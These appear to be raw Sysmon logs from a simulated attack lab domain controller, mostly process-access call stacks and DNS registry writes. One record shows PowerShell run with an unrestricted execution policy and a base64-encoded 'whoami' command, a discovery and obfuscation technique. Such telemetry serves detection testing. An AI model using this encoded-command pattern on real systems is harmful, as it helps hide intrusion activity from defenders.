13:10:23.164{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.148{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-42BE-6000-8B00-000000009A01}50325052C:\Windows\system32\conhost.exe{08A6967A-42BF-6000-8E00-000000009A01}4248C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42BF-6000-8E00-000000009A01}4248C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.039{08A6967A-42BE-6000-8D00-000000009A01}51164252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-42BF-6000-8E00-000000009A01}4248C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f4242519(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e3123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e2df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f41946d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36a398a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f3701e59(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e54be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e54be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e534f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36d72d4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e3807(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e33fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e3123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36e2df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f41946d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36c9c55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f36c9225(wow64) 154100x80000000000000002985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:23.043{08A6967A-42BF-6000-8E00-000000009A01}4248C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-42BE-6000-B81C-090000000000}0x91cb80HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{08A6967A-42BE-6000-8D00-000000009A01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 13241300x80000000000000003016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000003015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000003014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000003013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000003012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000003011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000003010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000003009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000003008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000003007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000003006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000003005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-250 13241300x80000000000000003004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:24.429{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000003057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-42C5-6000-9000-000000009A01}31484100C:\Windows\system32\conhost.exe{08A6967A-42C5-6000-9200-000000009A01}4392C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.539{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 